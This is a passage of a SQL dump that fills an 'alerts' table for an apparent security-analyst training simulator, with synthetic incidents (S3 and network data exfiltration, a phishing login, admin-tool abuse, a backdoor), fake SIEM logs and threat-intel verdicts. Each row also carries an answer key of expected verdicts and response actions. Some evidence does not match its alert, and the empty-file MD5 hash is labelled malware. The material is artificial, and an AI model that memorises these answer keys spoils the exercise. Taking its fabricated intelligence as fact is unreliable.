OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws 
OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws 
OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(875, 'Exfiltration of Sensitive Data', 'critical', 'VPC Flow Logs', 'An attacker exfiltrated sensitive data using encrypted channels, covering tracks to avoid detection by standard monitoring tools.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T13:45:30Z\",\"src_ip\":\"10.1.1.15\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":443,\"bytes_sent\":10485760,\"bytes_received\":1024,\"action\":\"ACCEPT\",\"session_start\":\"2023-10-05T13:40:00Z\",\"session_end\":\"2023-10-05T13:45:30Z\",\"user\":\"jdoe\",\"file_hash\":\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\",\"file_name\":\"sensitive_data.zip\"}', '2026-01-15 00:53:58', '2026-02-16 17:56:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration server associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"File name indicative of sensitive data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Records\",\"verdict\":\"clean\",\"details\":\"Valid employee 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(876, 'Suspicious Login Attempt Detected', 'medium', 'SIEM Logs', 'A suspicious login attempt was detected from an external IP address. The attempt involved a targeted spear-phishing campaign aiming to harvest employee credentials. The attacker used a known malicious IP address to attempt access to an internal Twitter employee account.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_id\":\"1001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"action\":\"login_attempt\",\"status\":\"failed\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"email_subject\":\"Urgent: Update Your Password\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-15 00:55:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used in previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted employee workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Active employee account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known phishing malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your 
Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(877, 'Unauthorized Use of Admin Tools', 'high', 'Internal Monitoring Systems', 'An attacker with compromised credentials exploited internal admin tools to manipulate account settings of high-profile Twitter users.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_id\":\"EVT00012345\",\"source_ip\":\"45.76.78.90\",\"internal_ip\":\"10.1.1.15\",\"username\":\"compromised_admin\",\"actions\":[{\"tool\":\"TwitterAdminTool.exe\",\"action\":\"modify_account_settings\",\"target_account\":\"high_profile_user\",\"timestamp\":\"2023-10-01T14:24:10Z\"}],\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"TwitterAdminTool.exe\",\"activity\":\"Unauthorized manipulation of account settings\"}', '2026-01-15 00:55:54', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.78.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelService\",\"verdict\":\"malicious\",\"details\":\"Identified as a command and control server IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetworkMonitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"UserBehaviorAnalytics\",\"verdict\":\"suspicious\",\"details\":\"Account behavior indicates potential compromise.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with malware used for credential 
theft.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"TwitterAdminTool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"SecuritySoftware\",\"verdict\":\"suspicious\",\"details\":\"File used to execute unauthorized actions on admin accounts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(878, 'Creation of Persistent Access Channels', 'high', 'Endpoint Detection and Response', 'The attacker has established backdoor access to ensure persistent access to the compromised accounts, allowing them to return even if initial credentials are revoked.', 'Persistence', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T14:22:08Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"filename\":\"backdoor.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_type\":\"Execution\",\"event_description\":\"Suspicious binary executed with the objective of maintaining persistent access.\",\"process_id\":\"5720\",\"process_name\":\"backdoor.exe\",\"destination\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\backdoor.exe\"}', '2026-01-15 00:55:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with multiple cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Backdoor executable known to maintain persistent access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active 
